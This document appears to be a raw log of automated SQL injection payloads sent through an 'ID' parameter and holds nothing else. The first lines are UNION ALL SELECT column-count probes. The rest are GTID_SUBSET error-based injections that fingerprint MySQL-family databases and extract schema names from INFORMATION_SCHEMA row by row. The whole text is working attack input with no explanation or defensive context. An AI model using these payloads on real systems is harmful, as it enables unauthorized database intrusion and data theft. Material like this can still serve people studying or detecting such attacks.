ID:-3117' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4361' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-6853' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-8281' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-4189' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-7897' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-9214' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-8618' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:-3913' UNION ALL SELECT 89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT (CASE WHEN (1657=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1657) THEN 1 ELSE 0 END)),0x7162717871),8938) AND 'gMos'='gMos
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT REPEAT(0x34,1024)),0x7162717871),4153) AND 'UaBg'='UaBg
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT REPEAT(0x30,190)),0x7162717871),2577) AND 'JMHo'='JMHo
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x7162717871),7637) AND 'qCuH'='qCuH
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT (CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END)),0x7162717871),3844) AND 'PDfp'='PDfp
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END)),0x7162717871),4884) AND 'KEjf'='KEjf
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END)),0x7162717871),1194) AND 'rZUo'='rZUo
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT (CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END)),0x7162717871),6629) AND 'wdpi'='wdpi
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x7162717871),8009) AND 'JohK'='JohK
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7162717871),4919) AND 'DbEe'='DbEe
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x7162717871),3369) AND 'Fxag'='Fxag
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x7162717871),1215) AND 'mbaI'='mbaI
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),0x7162717871),3949) AND 'hcYn'='hcYn
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),0x7162717871),8556) AND 'UVus'='UVus
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),0x7162717871),5282) AND 'zTXn'='zTXn
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),0x7162717871),4759) AND 'fjzo'='fjzo
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),0x7162717871),1865) AND 'sDHL'='sDHL
ID:1' AND GTID_SUBSET(CONCAT(0x716b717671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 8,1),0x7162717871),2256) AND 'gNZW'='gNZW
